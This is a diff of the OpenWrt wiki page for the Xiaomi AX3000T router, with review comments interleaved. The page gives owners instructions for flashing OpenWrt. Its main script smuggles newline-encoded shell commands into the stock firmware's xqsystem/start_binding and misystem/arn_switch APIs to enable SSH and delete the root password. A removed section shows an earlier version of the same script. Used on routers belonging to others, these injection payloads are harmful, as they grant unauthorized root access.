Differences

This shows you the differences between two versions of the page.

inbox:toh:xiaomi:ax3000t [2024/09/27 21:40] – Firmware support clarification for Winbond and ESMT alexq
inbox:toh:xiaomi:ax3000t [2024/10/03 10:00] – refactoring Wiki instructions alexq
Line 24: Line 24:
 **Support Forums** https://forum.openwrt.org/t/openwrt-support-for-xiaomi-ax3000t/180490 **Support Forums** https://forum.openwrt.org/t/openwrt-support-for-xiaomi-ax3000t/180490
  
-There are known OpenWrt installation methods for the Xiaomi AX3000T: +There are known OpenWrt installation methods for the Xiaomi AX3000T: 
-  * **SSH exploit method**: the method involves executing cURL commands on the stock router firmware that allows enabling SSH access, thus making OpenWrt installation possible. This method is suitable for both **RD23** (International version) and **RD03** (Chinese version) of the Xiaomi AX3000T router. For details, please refer to the [[:inbox:toh:xiaomi:ax3000t#installation|Installation]] section below.  +  * **API RCE method**: the method involves executing shell commands on the stock router firmware to enable SSH access by exploiting the API RCEeither in ''xqsystem/start_binding'' or ''misystem/arn_switch'', depending on the firmware version. This method is suitable for both **RD23** (International version) and **RD03** (Chinese version) of the Xiaomi AX3000T router. For details, please refer to the [[:inbox:toh:xiaomi:ax3000t#installation|Installation]] section below. 
-    * note: //this method is not supported by stock firmware version 1.0.47 (CN).//+
   * **UART flash method**: the method which requires opening the device, connecting a UART cable, and following a specific set of steps. This process is recommended only for advanced users and may soft brick your device. The instructions for this process are available in this post: [[https://forum.openwrt.org/t/openwrt-support-for-xiaomi-ax3000t/180490/420?u=alexq|link to owrt forum]].   * **UART flash method**: the method which requires opening the device, connecting a UART cable, and following a specific set of steps. This process is recommended only for advanced users and may soft brick your device. The instructions for this process are available in this post: [[https://forum.openwrt.org/t/openwrt-support-for-xiaomi-ax3000t/180490/420?u=alexq|link to owrt forum]].
-  * **Firmware downgrade method** (legacy): the method requires installing a vulnerable version of the stock firmware, which allows to proceed with commands to enable SSH access in a way similar to the "SSH exploit method". This method is applicable only for **RD03** (Chinese version). For details, please refer to the [[:inbox:toh:xiaomi:ax3000t#downgrading_stock_firmware|Downgrading stock firmware]] section. 
  
-Stock firmware compatibility and OpenWrt installation methods+OpenWrt Support Status
-^ Stock Firmware ver.             ^Model OpenWrt Installation Method     ^ OpenWrt Supported     ^ Stock Firmware URL  ^ +^ Stock Firmware ver.             ^Model API to exploit     ^ OpenWrt Supported     ^ Stock Firmware URL  ^ 
-| 1.0.31 (INT)         | RD23 | SSH exploit                YES*             | -                                          | +| 1.0.31 (INT)         | RD23 | ''xqsystem/start_binding''                YES*             | -                                          | 
-| 1.0.49 (INT)         | RD23 | SSH exploit                YES*             | [[https://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/rd23/miwifi_rd23_firmware_153e1_1.0.49_INT.bin|miwifi_rd23_firmware_153e1_1.0.49_INT.bin]] | +| 1.0.49 (INT)         | RD23 | ''xqsystem/start_binding''                YES*             | [[https://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/rd23/miwifi_rd23_firmware_153e1_1.0.49_INT.bin|miwifi_rd23_firmware_153e1_1.0.49_INT.bin]] | 
-| 1.0.47 (CN)          | RD03 | Firmware downgrade       |   YES*             | [[https://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/rd03/miwifi_rd03_firmware_ef0ee_1.0.47.bin|miwifi_rd03_firmware_ef0ee_1.0.47.bin]] |  +| 1.0.47 (CN)          | RD03 | ''misystem/arn_switch''       |   YES*              | [[https://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/rd03/miwifi_rd03_firmware_ef0ee_1.0.47.bin|miwifi_rd03_firmware_ef0ee_1.0.47.bin]] |  
-| 1.0.64 (CN)          | RD03 | Any                        YES*             | [[https://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/rd03/miwifi_rd03_firmware_14680_1.0.64.bin|miwifi_rd03_firmware_14680_1.0.64.bin]]  |  +| 1.0.64 (CN)          | RD03 | ''xqsystem/start_binding''                        YES*             | [[https://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/rd03/miwifi_rd03_firmware_14680_1.0.64.bin|miwifi_rd03_firmware_14680_1.0.64.bin]]  |  
-| 1.0.84 (CN)          | RD03 |SSH exploit                **Not yet** (''AN8855'' hardware) | [[https://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/rd03/miwifi_rd03_firmware_f85f9_1.0.84.bin|miwifi_rd03_firmware_f85f9_1.0.84.bin]]| +| 1.0.84 (CN)          | RD03 | ''xqsystem/start_binding''                **Not yet** (''AN8855'' hardware) | [[https://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/rd03/miwifi_rd03_firmware_f85f9_1.0.84.bin|miwifi_rd03_firmware_f85f9_1.0.84.bin]]| 
  
   * *note: devices with the ''Winbond'' NAND chip are supported by [[:releases:snapshot|Snapshot]] version only.   * *note: devices with the ''Winbond'' NAND chip are supported by [[:releases:snapshot|Snapshot]] version only.
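Review bot: The 1.0.84 (CN) row of the new table lists ''xqsystem/start_binding'' under "API to exploit" while the "OpenWrt Supported" column says "Not yet" for ''AN8855'' hardware, so a reader scanning only the API column can conclude that the unit is ready to flash. Suggest a footnote on that row saying that the API column describes SSH access only and that the support column decides whether to proceed. The bullet above the table also no longer says which firmware maps to which endpoint; it should point to this table rather than to the Installation section.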
Line 67: Line 65:
  
 ==== Flash instructions ==== ==== Flash instructions ====
 +<WRAP center round info 60%>
 +Besides the manual steps outlined below, there is the [[https://github.com/openwrt-xiaomi/xmir-patcher|XMiR-Patcher]] tool that can automate the entire process, making the first-time router flashing much simpler with just a few clicks. As always, know what you're doing when executing scripts from the internet!
 +</WRAP>
  
 1. Get ssh access.  1. Get ssh access. 
- +  #!/bin/sh
-  #!/bin/bash+
      
-  if [ "$1" = "" ]; then +  if [ $# -ne 2 ]; then 
-    echo "Usage: $0 [stok]" +  cat <<EOF 
-    echo "e.g. $0 e6ea114ba2cddb0c70fbbc417bb2706c" +  Usage: $0 [misystem | xqsystem] [stok] 
-    echo "Copy the stok-string from a browser's URL-line, while being logged in to the router" +  e.g. $0 misystem e6ea114ba2cddb0c70fbbc417bb2706c 
-    exit 1+  Copy the stok-string from a browser's URL-line, while logged to the router 
 +  EOF 
 +  exit 1
   fi   fi
      
-  curl -X POST "http://192.168.31.1/cgi-bin/luci/;stok=${1}/api/xqsystem/start_binding" -d "uid=1234&key=1234'%0Anvram%20set%20ssh_en%3D1'"+  -z "$2" ] && echo "error: bad stok" && exit 1 
 +   
 +  url="http://192.168.31.1/cgi-bin/luci/;stok=${2}/api
 +   
 +  case "$1" in 
 +      misystem) 
 +          url="$url/misystem/arn_switch" 
 +          pre="open=1&model=1&level=" 
 +          suf="" 
 +          ;; 
 +      xqsystem) 
 +          url="$url/xqsystem/start_binding" 
 +          pre="uid=1234&key=1234'
 +          suf="'" 
 +          ;; 
 +      *) 
 +          echo "error: unknown api" && exit 1 
 +          ;; 
 +  esac 
 +   
 +  curl -X POST "$url" -d "${pre}%0Anvram%20set%20ssh_en%3D1%0A${suf}"
   sleep 1   sleep 1
-  curl -X POST "http://192.168.31.1/cgi-bin/luci/;stok=${1}/api/xqsystem/start_binding" -d "uid=1234&key=1234'%0Anvram%20commit'"+  curl -X POST "$url" -d "${pre}%0Anvram%20commit%0A${suf}"
   sleep 1   sleep 1
-  curl -X POST "http://192.168.31.1/cgi-bin/luci/;stok=${1}/api/xqsystem/start_binding" -d "uid=1234&key=1234'%0Ased%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%22debug%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear'"+  curl -X POST "$url" -d "${pre}%0Ased%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%22debug%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%0A${suf}"
   sleep 1   sleep 1
-  curl -X POST "http://192.168.31.1/cgi-bin/luci/;stok=${1}/api/xqsystem/start_binding" -d "uid=1234&key=1234'%0A%2Fetc%2Finit.d%2Fdropbear%20start'"+  curl -X POST "$url" -d "${pre}%0A%2Fetc%2Finit.d%2Fdropbear%20start%0A${suf}"
   sleep 1   sleep 1
-  curl -X POST "http://192.168.31.1/cgi-bin/luci/;stok=${1}/api/xqsystem/start_binding" -d "uid=1234&key=1234'%0Apasswd%20-d%20root%0A'"+  curl -X POST "$url" -d "${pre}%0Apasswd%20-d%20root%0A${suf}"
  
 2. Backup stock partitions 2. Backup stock partitions
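Review bot: None of the five ''curl -X POST "$url"'' calls in the new script checks for failure, so an expired or mistyped stok lets the script run to the end without any error being reported. Suggest ''curl -fsS'' with ''|| exit 1'' on each call, and showing the router's response so the reader can tell whether a step was accepted. The ''-z "$2"'' test only catches an explicitly empty argument after the ''$# -ne 2'' check; a format check on the stok would be more useful, since it is interpolated into the URL unvalidated. The final step, ''passwd -d root'', leaves root without a password while dropbear is running, and the instructions should tell the reader to set a password or flash straight away. As rendered here, the ''url='' line and the xqsystem ''pre='' line appear without their closing quotes, which is worth checking against the wiki source.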
Line 111: Line 133:
  
  
-3. Get firmware information `cat /proc/cmdline`+3. Get firmware information: ''cat /proc/cmdline''
  
 4. Copy openwrt-mediatek-filogic-xiaomi_mi-router-ax3000t-initramfs-factory.ubi to **/tmp** and flash 4. Copy openwrt-mediatek-filogic-xiaomi_mi-router-ax3000t-initramfs-factory.ubi to **/tmp** and flash
  
-If **firmware=0**+  * If **firmware=0** 
   ubiformat /dev/mtd9 -y -f /tmp/openwrt-mediatek-filogic-xiaomi_mi-router-ax3000t-initramfs-factory.ubi   ubiformat /dev/mtd9 -y -f /tmp/openwrt-mediatek-filogic-xiaomi_mi-router-ax3000t-initramfs-factory.ubi
   nvram set boot_wait=on   nvram set boot_wait=on
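Review bot: Step 3 still does not say what to read from the ''cat /proc/cmdline'' output, yet step 4 branches on **firmware=0** versus **firmware=1** and the two branches write to different partitions (''/dev/mtd9'' and ''/dev/mtd8''). Suggest adding to step 3 that the reader should note the ''firmware='' value in the output before continuing, so the branch in step 4 is chosen from an observed value rather than guessed.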
Line 127: Line 150:
   reboot   reboot
  
-If **firmware=1**+  * If **firmware=1** 
   ubiformat /dev/mtd8 -y -f /tmp/openwrt-mediatek-filogic-xiaomi_mi-router-ax3000t-initramfs-factory.ubi   ubiformat /dev/mtd8 -y -f /tmp/openwrt-mediatek-filogic-xiaomi_mi-router-ax3000t-initramfs-factory.ubi
   nvram set boot_wait=on   nvram set boot_wait=on
Line 139: Line 163:
   reboot   reboot
  
-Then reboot your router, it should boot to the OpenWrt initramfs system now. To be sure to use one of OpenWrt's LAN ports (not WAN port), plug the ethernet cable into one of the middle ports, if the cable is not already plugged there (original FW dynamically assigns LAN/WAN).+Once the router is rebooted, it should boot to the OpenWrt initramfs system now. To be sure to use one of OpenWrt's LAN ports (not WAN port), plug the ethernet cable into one of the middle ports, if the cable is not already plugged there (original FW dynamically assigns LAN/WAN).
  
 Note that you should configure the computer's network to use DHCP. You can use wireshark if things don't work. Note that you should configure the computer's network to use DHCP. You can use wireshark if things don't work.
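Review bot: Style point on the reworded sentence: "Once the router is rebooted, it should boot to the OpenWrt initramfs system now" keeps the trailing "now" from the old wording, which no longer fits after "Once". Suggest "After the reboot, the router should come up in the OpenWrt initramfs system."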
Line 150: Line 174:
   sysupgrade -n /tmp/openwrt-mediatek-filogic-xiaomi_mi-router-ax3000t-squashfs-sysupgrade.bin   sysupgrade -n /tmp/openwrt-mediatek-filogic-xiaomi_mi-router-ax3000t-squashfs-sysupgrade.bin
  
-6. Run command to modify /etc/rc.local file with nvram settings:  
-  sed -i '/exit 0/i sleep 5\nfw_setenv flag_try_sys1_failed 0' /etc/rc.local 
  
 ==== Change to OpenWrt U-Boot ==== ==== Change to OpenWrt U-Boot ====
Line 166: Line 188:
   opkg update && opkg install kmod-mtd-rw   opkg update && opkg install kmod-mtd-rw
  
-  insmod /lib/modules/$(uname -r)/mtd-rw.ko i_want_a_brick=1+  insmod mtd-rw i_want_a_brick=1
  
 3. Format ubi and create new ubootenv volume 3. Format ubi and create new ubootenv volume
Line 196: Line 218:
   opkg update && opkg install kmod-mtd-rw   opkg update && opkg install kmod-mtd-rw
  
-  insmod /lib/modules/$(uname -r)/mtd-rw.ko i_want_a_brick=1+  insmod mtd-rw i_want_a_brick=1
  
 4. Flash stock images from backup 4. Flash stock images from backup
Line 205: Line 227:
 Then reboot your router, waiting it finished rollback in minutes. Then reboot your router, waiting it finished rollback in minutes.
  
-====  Go Back to stock from default layout Openwrt ==== +====  Go Back to stock firmware from stock bootloader ==== 
   ubiformat /dev/mtd8 -y -f /tmp/ubi.bin   ubiformat /dev/mtd8 -y -f /tmp/ubi.bin
  
Line 272: Line 294:
  
 ===== Downgrading stock firmware ===== ===== Downgrading stock firmware =====
-<WRAP center round important 60%> +This section is kept only for historical reference, as it relates to the deprecated OpenWrt installation method that was applicable only to the RD03 (Chinese version) with stock firmware version 1.0.47. Please note that none of the current installation methods require a firmware downgrade to flash OpenWrt.
-This is a legacy OpenWrt installation method and applicable only to the RD03 (Chinese version), and is required only for installing OpenWrt via the "Firmware downgrade method"+
-</WRAP> +
- +
-1. Install Vulnerable Version: +
- +
-First, you'll need to grab a vulnerable software version. The table below shows known vulnerable versions. It is recommended to install version 1.0.47. +
-^ Firmware Version      ^ Vulnerable?  ^ Download                                                                                       ^ +
-| 1.0.64                | NO          | https://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/rd03/miwifi_rd03_firmware_14680_1.0.64.bin +
-| 1.0.47 (recommended)  | YES          | https://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/rd03/miwifi_rd03_firmware_ef0ee_1.0.47.bin +
- +
-**To downgrade**: navigate to the upload firmware page and select the appropriate software version. It will complain about the downgrade. Edit the url and change the <html>0</html> at the end to a <html>1</html> and press enterOr change to <html>2</html> if there is already <html>1</html> (seen on v1.0.64). The downgrade will proceed. +
- +
-2. Get ssh access (supported only stock firmware **1.0.47**): +
- +
-  #!/bin/bash +
-   +
-  if [ "$1" = "" ]; then +
-    echo "Usage: $0 [stok]" +
-    echo "e.g. $0 e6ea114ba2cddb0c70fbbc417bb2706c" +
-    echo "Copy the stok-string from a browser's URL-line, while being logged in to the router" +
-    exit 1 +
-  fi +
-   +
-  curl -X POST "http://192.168.31.1/cgi-bin/luci/;stok=${1}/api/misystem/arn_switch" -d "open=1&model=1&level=%0Anvram%20set%20ssh_en%3D1%0A" +
-  sleep 1 +
-  curl -X POST "http://192.168.31.1/cgi-bin/luci/;stok=${1}/api/misystem/arn_switch" -d "open=1&model=1&level=%0Anvram%20commit%0A" +
-  sleep 1 +
-  curl -X POST "http://192.168.31.1/cgi-bin/luci/;stok=${1}/api/misystem/arn_switch" -d "open=1&model=1&level=%0Ased%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%22debug%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%0A" +
-  sleep 1 +
-  curl -X POST "http://192.168.31.1/cgi-bin/luci/;stok=${1}/api/misystem/arn_switch" -d "open=1&model=1&level=%0A%2Fetc%2Finit.d%2Fdropbear%20start%0A" +
-  sleep 1 +
-  curl -X POST "http://192.168.31.1/cgi-bin/luci/;stok=${1}/api/misystem/arn_switch" -d "open=1&model=1&level=%0Apasswd%20-d%20root%0A"+
  
-After thatproceed from step 2 in the main [[:inbox:toh:xiaomi:ax3000t#installation|Installation]] section.+**To downgrade** a firmware version on your routernavigate to the upload firmware page and select the appropriate software version. It will complain about the downgrade. Edit the url and change the <html>0</html> at the end to a <html>1</html> and press enter. Or change to <html>2</html> if there is already <html>1</html> (seen on v1.0.64). The downgrade will proceed.
  
 ===== Debricking ===== ===== Debricking =====
 -> [[docs:guide-user:troubleshooting:generic.debrick]] -> [[docs:guide-user:troubleshooting:generic.debrick]]
  
-Assume that you have installed OpenWrt with stock layout, with original u-boot:+Assume that you have installed OpenWrt with stock bootloader, with original u-boot:
  
   * Connect to router via UART   * Connect to router via UART
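Review bot: The retained "To downgrade" paragraph tells the reader to "select the appropriate software version", but this hunk removes the version table and the 1.0.47 recommendation that gave that phrase its meaning. Since the section is now marked as historical, either name the version and link to the firmware table under "OpenWrt Support Status", or say that no particular version is implied. The new introductory sentence is also long; splitting it after "historical reference" would read better.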
Line 330: Line 320:
 Details explained in [[https://forum.openwrt.org/t/openwrt-support-for-xiaomi-ax3000t/180490/860|this forum post]] Details explained in [[https://forum.openwrt.org/t/openwrt-support-for-xiaomi-ax3000t/180490/860|this forum post]]
  
-==== TFTP instructions for the stock layout ====+==== TFTP instructions for the stock bootloader ====
 AX3000T can be recovered from a soft-brick with TFTP. The flow is: AX3000T can be recovered from a soft-brick with TFTP. The flow is:
   * The router boots and asks for an IP address on the LAN ports via DHCP   * The router boots and asks for an IP address on the LAN ports via DHCP
Line 373: Line 363:
 -> [[docs:guide-user:base-system:start|Basic configuration]] After flashing, proceed with this.\\ -> [[docs:guide-user:base-system:start|Basic configuration]] After flashing, proceed with this.\\
 Set up your Internet connection, configure wireless, configure USB port, etc. Set up your Internet connection, configure wireless, configure USB port, etc.
 +
 +  * note: configuration reset issue after 6 reboots sometimes occurs on the AX3000T and is [[https://forum.openwrt.org/t/openwrt-support-for-xiaomi-ax3000t/180490/452?u=alexq|caused]] by the stock Xiaomi bootloader logic. To address this, run the command to modify the /etc/rc.local file with nvram settings:
 +
 +  sed -i '/exit 0/i sleep 5\nfw_setenv flag_try_sys1_failed 0' /etc/rc.local
 +
 +**Don't run** this command if the issue doesn't affect you, and your router keeps its settings after 6 reboots! 
  
 ===== Specific Configuration ===== ===== Specific Configuration =====
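Review bot: The "**Don't run**" warning sits after the ''sed -i'' command in the new note, so a reader working top to bottom has already pasted the command before reaching the condition; move the condition ahead of the command. The command is also not idempotent: ''sed -i '/exit 0/i ...' '' inserts the two lines before ''exit 0'' on every run, so a second run duplicates them in /etc/rc.local. Suggest guarding it with a check such as ''grep -q flag_try_sys1_failed /etc/rc.local ||'' in front of the ''sed''.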
  • Last modified: 2024/12/19 08:57
  • by lessload